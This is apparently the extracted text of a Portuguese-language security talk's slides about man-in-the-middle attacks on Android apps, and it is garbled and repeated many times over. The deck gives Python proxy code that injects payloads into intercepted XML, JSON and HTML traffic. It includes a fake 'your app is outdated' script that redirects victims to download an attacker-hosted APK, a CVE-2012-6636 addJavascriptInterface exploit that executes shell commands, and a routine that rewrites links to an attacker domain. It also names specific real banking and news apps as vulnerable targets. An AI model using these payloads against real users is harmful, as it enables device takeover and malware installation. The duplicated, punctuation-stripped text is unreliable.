def processXML(data log) for child in dataiter() if child = None if childtag = None and isinstance(childtag basestring) if len(child) == 0 if childtext = None if scanForHtmlTag(childtext) childtext = payload
payload = ltimg width=30 height=43 title= alt= src=dataimagepngbase64
XML
Injetando
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload else processJson(data[key]) else return
JSON
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Injetando
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload else processJson(data[key]) else return
JSON
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
